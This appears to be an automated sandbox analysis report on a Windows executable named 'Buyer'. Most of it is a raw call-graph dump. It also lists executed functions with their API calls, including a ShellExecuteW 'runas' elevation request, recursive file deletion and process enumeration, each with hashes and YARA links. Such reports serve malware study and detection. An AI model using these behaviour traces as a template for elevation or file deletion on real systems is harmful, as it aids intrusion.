107582 f456aa 40 API calls 107581->107582 107583 fb3487 107582->107583 107584 f456d4 64 API calls 107583->107584 107585 fb349e ___std_exception_copy 107584->107585 107586 f456aa 40 API calls 107585->107586 107587 fb34c3 107586->107587 107588 fb2fe7 27 API calls 107587->107588 107590 fb34d9 107588->107590 107589 fb342a 107589->107518 107590->107589 107593 f6015b 8 API calls 107592->107593 107594 fa9d62 __fread_nolock 107593->107594 107594->107540 107594->107594 107596 f4aac3 107595->107596 107601 f4aa49 __fread_nolock 107595->107601 107598 f6015b 8 API calls 107596->107598 107597 f6012b 8 API calls 107599 f4aa50 107597->107599 107598->107601 107600 f6012b 8 API calls 107599->107600 107602 f4aa6e 107599->107602 107600->107602 107601->107597 107602->107540 107604 f44bcb 107603->107604 107606 f44c6f 107603->107606 107605 f6015b 8 API calls 107604->107605 107608 f44bfd 107604->107608 107605->107608 107606->107540 107607 f6012b 8 API calls 107607->107608 107608->107606 107608->107607 107609->107528 107611 f45556 107610->107611 107615 f4555d 107610->107615 107935 f6e9c8 107611->107935 107613 f45574 107613->107523 107614 f846bc FreeLibrary 107615->107613 107615->107614 107616->107529 107617->107540 107618->107540 107619->107531 107621 f454d9 107620->107621 107622 f454bb GetProcAddress 107620->107622 107625 f6e93b 107621->107625 107623 f454cb 107622->107623 107623->107621 107624 f454d2 FreeLibrary 107623->107624 107624->107621 107657 f6e87a 107625->107657 107627 f454fd 107627->107553 107627->107554 107629 f454a0 107628->107629 107630 f45481 GetProcAddress 107628->107630 107633 f45580 107629->107633 107631 f45491 107630->107631 107631->107629 107632 f45499 FreeLibrary 107631->107632 107632->107629 107634 f6015b 8 API calls 107633->107634 107635 f45595 107634->107635 107636 f43966 8 API calls 107635->107636 107637 f455a1 __fread_nolock 107636->107637 107638 f846da 107637->107638 107645 f455dc 107637->107645 107723 fb3738 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 107637->107723 107724 fb37bc 74 API calls 107638->107724 107641 f456aa 40 API calls 107641->107645 107643 f45670 ISource 107643->107562 107644 f8471e 107718 f456d4 107644->107718 107645->107641 107645->107643 107645->107644 107646 f456d4 64 API calls 107645->107646 107646->107645 107648 f456aa 40 API calls 107648->107643 107650 f84778 107649->107650 107651 f456bc 107649->107651 107771 f6ec14 107651->107771 107654 fb2fe7 107911 fb2e37 107654->107911 107656 fb3002 107656->107569 107660 f6e886 ___scrt_is_nonwritable_in_current_image 107657->107660 107658 f6e894 107682 f72b68 20 API calls __dosmaperr 107658->107682 107660->107658 107662 f6e8c4 107660->107662 107661 f6e899 107683 f72aac 26 API calls __fread_nolock 107661->107683 107664 f6e8d6 107662->107664 107665 f6e8c9 107662->107665 107674 f783b1 107664->107674 107684 f72b68 20 API calls __dosmaperr 107665->107684 107668 f6e8df 107669 f6e8e5 107668->107669 107670 f6e8f2 107668->107670 107685 f72b68 20 API calls __dosmaperr 107669->107685 107686 f6e924 LeaveCriticalSection __fread_nolock 107670->107686 107672 f6e8a4 __fread_nolock 107672->107627 107675 f783bd ___scrt_is_nonwritable_in_current_image 107674->107675 107687 f732ae EnterCriticalSection 107675->107687 107677 f783cb 107688 f7844b 107677->107688 107681 f783fc __fread_nolock 107681->107668 107682->107661 107683->107672 107684->107672 107685->107672 107686->107672 107687->107677 107696 f7846e 107688->107696 107689 f783d8 107702 f78407 107689->107702 107690 f784c7 107707 f74fcd 20 API calls 2 library calls 107690->107707 107692 f784d0 107708 f72d18 107692->107708 107695 f784d9 107695->107689 107714 f73755 11 API calls 2 library calls 107695->107714 107696->107689 107696->107690 107696->107696 107705 f694dd EnterCriticalSection 107696->107705 107706 f694f1 LeaveCriticalSection 107696->107706 107699 f784f8 107715 f694dd EnterCriticalSection 107699->107715 107701 f7850b 107701->107689 107717 f732f6 LeaveCriticalSection 107702->107717 107704 f7840e 107704->107681 107705->107696 107706->107696 107707->107692 107709 f72d23 RtlFreeHeap 107708->107709 107710 f72d4c __dosmaperr 107708->107710 107709->107710 107711 f72d38 107709->107711 107710->107695 107716 f72b68 20 API calls __dosmaperr 107711->107716 107713 f72d3e GetLastError 107713->107710 107714->107699 107715->107701 107716->107713 107717->107704 107719 f84798 107718->107719 107720 f456e3 107718->107720 107725 f6f033 107720->107725 107723->107638 107724->107645 107728 f6edfa 107725->107728 107727 f456f1 107727->107648 107729 f6ee06 ___scrt_is_nonwritable_in_current_image 107728->107729 107730 f6ee12 107729->107730 107732 f6ee38 107729->107732 107753 f72b68 20 API calls __dosmaperr 107730->107753 107741 f694dd EnterCriticalSection 107732->107741 107734 f6ee17 107754 f72aac 26 API calls __fread_nolock 107734->107754 107735 f6ee44 107742 f6ef5a 107735->107742 107738 f6ee58 107755 f6ee77 LeaveCriticalSection __fread_nolock 107738->107755 107740 f6ee22 __fread_nolock 107740->107727 107741->107735 107743 f6ef7c 107742->107743 107744 f6ef6c 107742->107744 107756 f6ee81 107743->107756 107769 f72b68 20 API calls __dosmaperr 107744->107769 107747 f6ef71 107747->107738 107748 f6ef9f 107752 f6f01e 107748->107752 107760 f6df5b 107748->107760 107752->107738 107753->107734 107754->107740 107755->107740 107757 f6ee94 107756->107757 107759 f6ee8d 107756->107759 107758 f79774 __fread_nolock 28 API calls 107757->107758 107757->107759 107758->107759 107759->107748 107761 f6df73 107760->107761 107765 f6df6f 107760->107765 107762 f6dca5 __fread_nolock 26 API calls 107761->107762 107761->107765 107763 f6df93 107762->107763 107770 f75d0e 62 API calls 4 library calls 107763->107770 107766 f79774 107765->107766 107767 f796db __fread_nolock 28 API calls 107766->107767 107768 f7978a 107767->107768 107768->107752 107769->107747 107770->107765 107774 f6ec31 107771->107774 107773 f456cd 107773->107654 107775 f6ec3d ___scrt_is_nonwritable_in_current_image 107774->107775 107776 f6ec50 ___scrt_fastfail 107775->107776 107777 f6ec7d 107775->107777 107778 f6ec75 __fread_nolock 107775->107778 107801 f72b68 20 API calls __dosmaperr 107776->107801 107787 f694dd EnterCriticalSection 107777->107787 107778->107773 107781 f6ec87 107788 f6ea48 107781->107788 107782 f6ec6a 107802 f72aac 26 API calls __fread_nolock 107782->107802 107787->107781 107789 f6ea77 107788->107789 107791 f6ea5a ___scrt_fastfail 107788->107791 107803 f6ecbc LeaveCriticalSection __fread_nolock 107789->107803 107790 f6ea67 107869 f72b68 20 API calls __dosmaperr 107790->107869 107791->107789 107791->107790 107794 f6eaba __fread_nolock 107791->107794 107794->107789 107796 f6ebd6 ___scrt_fastfail 107794->107796 107797 f6dca5 __fread_nolock 26 API calls 107794->107797 107804 f79095 107794->107804 107871 f6d2c8 26 API calls 3 library calls 107794->107871 107872 f72b68 20 API calls __dosmaperr 107796->107872 107797->107794 107799 f6ea6c 107870 f72aac 26 API calls __fread_nolock 107799->107870 107801->107782 107802->107778 107803->107778 107805 f790a7 107804->107805 107806 f790bf 107804->107806 107889 f72b55 20 API calls __dosmaperr 107805->107889 107807 f79429 107806->107807 107813 f79104 107806->107813 107903 f72b55 20 API calls __dosmaperr 107807->107903 107809 f790ac 107890 f72b68 20 API calls __dosmaperr 107809->107890 107812 f7942e 107904 f72b68 20 API calls __dosmaperr 107812->107904 107815 f7910f 107813->107815 107818 f790b4 107813->107818 107822 f7913f 107813->107822 107891 f72b55 20 API calls __dosmaperr 107815->107891 107816 f7911c 107905 f72aac 26 API calls __fread_nolock 107816->107905 107818->107794 107819 f79114 107892 f72b68 20 API calls __dosmaperr 107819->107892 107823 f79158 107822->107823 107824 f7917e 107822->107824 107825 f7919a 107822->107825 107823->107824 107831 f79165 107823->107831 107893 f72b55 20 API calls __dosmaperr 107824->107893 107873 f73b70 107825->107873 107827 f79183 107894 f72b68 20 API calls __dosmaperr 107827->107894 107880 f7fbee 107831->107880 107833 f72d18 _free 20 API calls 107836 f791ba 107833->107836 107834 f7918a 107895 f72aac 26 API calls __fread_nolock 107834->107895 107835 f79303 107838 f79379 107835->107838 107841 f7931c GetConsoleMode 107835->107841 107839 f72d18 _free 20 API calls 107836->107839 107840 f7937d ReadFile 107838->107840 107842 f791c1 107839->107842 107843 f79397 107840->107843 107844 f793f1 GetLastError 107840->107844 107841->107838 107845 f7932d 107841->107845 107846 f791e6 107842->107846 107847 f791cb 107842->107847 107843->107844 107850 f7936e 107843->107850 107848 f79355 107844->107848 107849 f793fe 107844->107849 107845->107840 107851 f79333 ReadConsoleW 107845->107851 107855 f79774 __fread_nolock 28 API calls 107846->107855 107896 f72b68 20 API calls __dosmaperr 107847->107896 107867 f79195 __fread_nolock 107848->107867 107898 f72b32 20 API calls __dosmaperr 107848->107898 107901 f72b68 20 API calls __dosmaperr 107849->107901 107862 f793d3 107850->107862 107863 f793bc 107850->107863 107850->107867 107851->107850 107856 f7934f GetLastError 107851->107856 107852 f72d18 _free 20 API calls 107852->107818 107855->107831 107856->107848 107857 f791d0 107897 f72b55 20 API calls __dosmaperr 107857->107897 107858 f79403 107902 f72b55 20 API calls __dosmaperr 107858->107902 107864 f793ea 107862->107864 107862->107867 107899 f78db1 31 API calls 2 library calls 107863->107899 107900 f78bf1 29 API calls __fread_nolock 107864->107900 107867->107852 107868 f793ef 107868->107867 107869->107799 107870->107789 107871->107794 107872->107799 107874 f73bae 107873->107874 107878 f73b7e FindHandler 107873->107878 107907 f72b68 20 API calls __dosmaperr 107874->107907 107875 f73b99 RtlAllocateHeap 107877 f73bac 107875->107877 107875->107878 107877->107833 107878->107874 107878->107875 107906 f651fd 7 API calls 2 library calls 107878->107906 107881 f7fbfb 107880->107881 107882 f7fc08 107880->107882 107908 f72b68 20 API calls __dosmaperr 107881->107908 107884 f7fc14 107882->107884 107909 f72b68 20 API calls __dosmaperr 107882->107909 107884->107835 107886 f7fc00 107886->107835 107887 f7fc35 107910 f72aac 26 API calls __fread_nolock 107887->107910 107889->107809 107890->107818 107891->107819 107892->107816 107893->107827 107894->107834 107895->107867 107896->107857 107897->107867 107898->107867 107899->107867 107900->107868 107901->107858 107902->107867 107903->107812 107904->107816 107905->107818 107906->107878 107907->107877 107908->107886 107909->107887 107910->107886 107914 f6e838 107911->107914 107913 fb2e46 107913->107656 107917 f6e7b9 107914->107917 107916 f6e855 107916->107913 107918 f6e7dc 107917->107918 107919 f6e7c8 107917->107919 107924 f6e7d8 __alldvrm 107918->107924 107927 f7368f 11 API calls 2 library calls 107918->107927 107925 f72b68 20 API calls __dosmaperr 107919->107925 107921 f6e7cd 107926 f72aac 26 API calls __fread_nolock 107921->107926 107924->107916 107925->107921 107926->107924 107927->107924 107932 fb3565 107928->107932 107929 fb3426 107929->107576 107929->107589 107930 f456aa 40 API calls 107930->107932 107931 fb2fe7 27 API calls 107931->107932 107932->107929 107932->107930 107932->107931 107933 f456d4 64 API calls 107932->107933 107933->107932 107936 f6e9d4 ___scrt_is_nonwritable_in_current_image 107935->107936 107937 f6e9e5 107936->107937 107938 f6e9fa 107936->107938 107948 f72b68 20 API calls __dosmaperr 107937->107948 107947 f6e9f5 __fread_nolock 107938->107947 107950 f694dd EnterCriticalSection 107938->107950 107940 f6e9ea 107949 f72aac 26 API calls __fread_nolock 107940->107949 107942 f6ea16 107951 f6e952 107942->107951 107945 f6ea21 107947->107615 107948->107940 107949->107947 107950->107942 107952 f6e974 107951->107952 107953 f6e95f 107951->107953 107956 f6df5b 62 API calls 107952->107956 107965 f6e96f 107952->107965 107968 f72b68 20 API calls __dosmaperr 107953->107968 107955 f6e964 107958 f6e988 107956->107958 107965->107945 107968->107955 108011 f7944a 108012 f79457 108011->108012 108016 f7946f 108011->108016 108061 f72b68 20 API calls __dosmaperr 108012->108061 108014 f7945c 108062 f72aac 26 API calls __fread_nolock 108014->108062 108017 f794ca 108016->108017 108024 f79467 108016->108024 108063 f80117 21 API calls 2 library calls 108016->108063 108018 f6dca5 __fread_nolock 26 API calls 108017->108018 108020 f794e2 108018->108020 108031 f78f82 108020->108031 108022 f794e9 108023 f6dca5 __fread_nolock 26 API calls 108022->108023 108022->108024 108025 f79515 108023->108025 108025->108024 108026 f6dca5 __fread_nolock 26 API calls 108025->108026 108027 f79523 108026->108027 108027->108024 108028 f6dca5 __fread_nolock 26 API calls 108027->108028 108029 f79533 108028->108029 108030 f6dca5 __fread_nolock 26 API calls 108029->108030 108030->108024 108032 f78f8e ___scrt_is_nonwritable_in_current_image 108031->108032 108033 f78f96 108032->108033 108034 f78fae 108032->108034 108065 f72b55 20 API calls __dosmaperr 108033->108065 108036 f79074 108034->108036 108041 f78fe7 108034->108041 108072 f72b55 20 API calls __dosmaperr 108036->108072 108038 f78f9b 108066 f72b68 20 API calls __dosmaperr 108038->108066 108039 f79079 108073 f72b68 20 API calls __dosmaperr 108039->108073 108042 f78ff6 108041->108042 108043 f7900b 108041->108043 108067 f72b55 20 API calls __dosmaperr 108042->108067 108064 f75497 EnterCriticalSection 108043->108064 108045 f78fa3 __fread_nolock 108045->108022 108048 f79003 108074 f72aac 26 API calls __fread_nolock 108048->108074 108049 f78ffb 108068 f72b68 20 API calls __dosmaperr 108049->108068 108050 f79011 108052 f79042 108050->108052 108053 f7902d 108050->108053 108056 f79095 __fread_nolock 38 API calls 108052->108056 108069 f72b68 20 API calls __dosmaperr 108053->108069 108058 f7903d 108056->108058 108057 f79032 108070 f72b55 20 API calls __dosmaperr 108057->108070 108071 f7906c LeaveCriticalSection __wsopen_s 108058->108071 108061->108014 108062->108024 108063->108017 108064->108050 108065->108038 108066->108045 108067->108049 108068->108048 108069->108057 108070->108058 108071->108045 108072->108039 108073->108048 108074->108045 108075 f6074b 108076 f60757 ___scrt_is_nonwritable_in_current_image 108075->108076 108104 f60201 108076->108104 108078 f6075e 108079 f608b1 108078->108079 108082 f60788 108078->108082 108131 f60b8f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 108079->108131 108081 f608b8 108132 f651a2 28 API calls _abort 108081->108132 108093 f607c7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 108082->108093 108115 f7273d 108082->108115 108084 f608be 108133 f65154 28 API calls _abort 108084->108133 108088 f608c6 108089 f607a7 108091 f60828 108123 f60ca9 108091->108123 108093->108091 108127 f6516a 38 API calls 3 library calls 108093->108127 108095 f6082e 108096 f60843 108095->108096 108128 f60ce2 GetModuleHandleW 108096->108128 108098 f6084a 108098->108081 108099 f6084e 108098->108099 108100 f60857 108099->108100 108129 f65145 28 API calls _abort 108099->108129 108130 f60390 13 API calls 2 library calls 108100->108130 108103 f6085f 108103->108089 108105 f6020a 108104->108105 108134 f609e8 IsProcessorFeaturePresent 108105->108134 108107 f60216 108135 f62fe4 10 API calls 3 library calls 108107->108135 108109 f6021b 108114 f6021f 108109->108114 108136 f725d7 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 108109->108136 108111 f60228 108112 f60236 108111->108112 108137 f6300d 8 API calls 3 library calls 108111->108137 108112->108078 108114->108078 108117 f72754 108115->108117 108138 f60ddc 108117->108138 108118 f607a1 108118->108089 108119 f726e1 108118->108119 108120 f72710 108119->108120 108121 f60ddc __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 108120->108121 108122 f72739 108121->108122 108122->108093 108146 f62690 108123->108146 108126 f60ccf 108126->108095 108127->108091 108128->108098 108129->108100 108130->108103 108131->108081 108132->108084 108133->108088 108134->108107 108135->108109 108136->108111 108137->108114 108139 f60de7 IsProcessorFeaturePresent 108138->108139 108140 f60de5 108138->108140 108142 f60fad 108139->108142 108140->108118 108145 f60f71 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 108142->108145 108144 f61090 108144->108118 108145->108144 108147 f60cbc GetStartupInfoW 108146->108147 108147->108126

                                                                                                    Executed Functions

                                                                                                    Function 00F44E68 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 224libraryloaderCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 234 f44e68-f44ed7 call f4ae03 GetVersionExW call f47467 239 f44edd 234->239 240 f840e6-f840f9 234->240 242 f44edf-f44ee1 239->242 241 f840fa-f840fe 240->241 245 f84100 241->245 246 f84101-f8410d 241->246 243 f44ee7-f44f40 call f48635 call f4699d 242->243 244 f84125 242->244 258 f84259-f84260 243->258 259 f44f46-f44f48 243->259 251 f8412c-f84136 244->251 245->246 246->241 248 f8410f-f84111 246->248 248->242 250 f84117-f8411e 248->250 250->240 255 f84120 250->255 252 f84138-f84144 251->252 253 f84149-f84155 251->253 256 f44fa6-f44fc0 GetCurrentProcess IsWow64Process 252->256 253->256 255->244 260 f44fc2 256->260 261 f4501f-f45025 256->261 262 f84280-f84283 258->262 263 f84262 258->263 265 f8415a-f8416d 259->265 266 f44f4e-f44f51 259->266 264 f44fc8-f44fd4 260->264 261->264 271 f8426e-f84276 262->271 272 f84285-f84294 262->272 269 f84268 263->269 273 f8429e-f842a2 GetSystemInfo 264->273 274 f44fda-f44fe9 LoadLibraryA 264->274 267 f8416f-f84178 265->267 268 f84196-f84198 265->268 266->256 270 f44f53-f44f8f 266->270 275 f8417a-f84180 267->275 276 f84185-f84191 267->276 277 f8419a-f841af 268->277 278 f841cd-f841d0 268->278 269->271 270->256 279 f44f91-f44f9a 270->279 271->262 272->269 280 f84296-f8429c 272->280 281 f45027-f45031 GetSystemInfo 274->281 282 f44feb-f44ff9 GetProcAddress 274->282 275->256 276->256 284 f841bc-f841c8 277->284 285 f841b1-f841b7 277->285 287 f8420b-f8420e 278->287 288 f841d2-f841ed 278->288 279->251 286 f44fa0 279->286 280->271 283 f45001-f45003 281->283 282->281 289 f44ffb-f44fff GetNativeSystemInfo 282->289 290 f45005-f45006 FreeLibrary 283->290 291 f4500c-f4501e 283->291 284->256 285->256 286->256 287->256 294 f84214-f8423b 287->294 292 f841fa-f84206 288->292 293 f841ef-f841f5 288->293 289->283 290->291 292->256 293->256 295 f84248-f84254 294->295 296 f8423d-f84243 294->296 295->256 296->256
                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00F44E97
                                                                                                      • Part of subcall function 00F47467: _wcslen.LIBCMT ref: 00F4747A
                                                                                                    • GetCurrentProcess.KERNEL32(?,00FDDB24,00000000,?,?), ref: 00F44FAD
                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F44FB4
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F44FDF
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F44FF1
                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00F44FFF
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F45006
                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 00F4502B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                    • API String ID: 3290436268-192647395
                                                                                                    • Opcode ID: 8c30a1337f01af02213457eb05127d9faaf3e5bcd56bcc25e5cf31928d6a26a5
                                                                                                    • Instruction ID: ae5f42d5c48bf08ab747dcfa743d6e42fc0f0e6a4cff26bdefc09661a19f79b5
                                                                                                    • Opcode Fuzzy Hash: 8c30a1337f01af02213457eb05127d9faaf3e5bcd56bcc25e5cf31928d6a26a5
                                                                                                    • Instruction Fuzzy Hash: BC91A63290E3D5CFDB36DB7874446D97FA5AB76314B24C89AE4C0A324ED22E5448EB31
                                                                                                    Function 00FAD98E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 00F43FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F43E0E,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F44017
                                                                                                      • Part of subcall function 00FAE7DA: GetFileAttributesW.KERNEL32(?,00FAD57A), ref: 00FAE7DB
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00FADA05
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00FADA55
                                                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00FADA66
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FADA7D
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FADA86
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                    • Opcode ID: 1d2847adfd573119e825af58b622f307677f51a598d77efaa8a55ee8702e0476
                                                                                                    • Instruction ID: 6d79622aa45d8fb8e7064fda9fcc42cdb853706a85e722fb85ab65ebcb4ba862
                                                                                                    • Opcode Fuzzy Hash: 1d2847adfd573119e825af58b622f307677f51a598d77efaa8a55ee8702e0476
                                                                                                    • Instruction Fuzzy Hash: EC3152714493459BC301EF64CC819AFBBE8AE56310F444D1DF8E692192DB28DA0DEBA3
                                                                                                    Function 00F82F58 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00F42853
                                                                                                      • Part of subcall function 00F43DD1: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F82A98,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F43DEF
                                                                                                      • Part of subcall function 00F4A1D4: _wcslen.LIBCMT ref: 00F4A1DE
                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,01003204), ref: 00F82FC3
                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,01003204), ref: 00F82FCA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                    • String ID: runas
                                                                                                    • API String ID: 448630720-4000483414
                                                                                                    • Opcode ID: f3396d3e36547ee02f0162fb06bac872e7356da3f76193fe2382507e4df5b5a4
                                                                                                    • Instruction ID: 00549d0afa0e0009d895dc2414df2e88b090173a67d43a8adf158b0650c9af53
                                                                                                    • Opcode Fuzzy Hash: f3396d3e36547ee02f0162fb06bac872e7356da3f76193fe2382507e4df5b5a4
                                                                                                    • Instruction Fuzzy Hash: E9118431A442045BD745FB70EC51AAE7FA59FD0714F90042EB982560A3CA2D9949F752
                                                                                                    Function 00FADAC1 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00FADAE6
                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00FADAF4
                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00FADB14
                                                                                                    • FindCloseChangeNotification.KERNEL32(00000000), ref: 00FADBC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                                    • String ID:
                                                                                                    • API String ID: 3243318325-0
                                                                                                    • Opcode ID: 77e6150b9bd7aba5d1ec11718e2441f70e32bd46ced441c2f8c6f552dc1e3e2b
                                                                                                    • Instruction ID: 3a42bde8ebc706be811ab40d268f33d986afb3cb7b03d8583a1e00f27fea48ac
                                                                                                    • Opcode Fuzzy Hash: 77e6150b9bd7aba5d1ec11718e2441f70e32bd46ced441c2f8c6f552dc1e3e2b
                                                                                                    • Instruction Fuzzy Hash: 183161725083019FD304EF60DC85AAEBBE8EFD9350F04092DF985821A1DB759949DBA3
                                                                                                    Function 00FAE1AC Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetFileAttributesW.KERNEL32(?,00F83902), ref: 00FAE1BC
                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00FAE1CD
                                                                                                    • FindClose.KERNEL32(00000000), ref: 00FAE1DD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.2536104679.0000000000F41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F40000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.2536078154.0000000000F40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000000FDD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536159433.0000000001003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536212468.000000000100D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_f40000_Buyer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 48322524-0
                                                                                                    • Opcode ID: fac697c399a8e612965db58dfffee69e5e87ddbc594cd718d5e221f88e9a181d
                                                                                                    • Instruction ID: 353471d00f856f3da8a2bccd9eac8d0153ff51ecef5f396cd2caa5529ed2f9c1
                                                                                                    • Opcode Fuzzy Hash: fac697c399a8e612965db58dfffee69e5e87ddbc594cd718d5e221f88e9a181d
                                                                                                    • Instruction Fuzzy Hash: A9E086758255246B92106738EC4D8FA7B9D9F07336F100B16F9B5C21E0EB70DE40B6D6
                                                                                                    Function 00F4DCC0 Relevance: 21.6, APIs: 14, Instructions: 643windowsleeptimeCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 00F4DDA7
                                                                                                    • timeGetTime.WINMM ref: 00F4DFA7
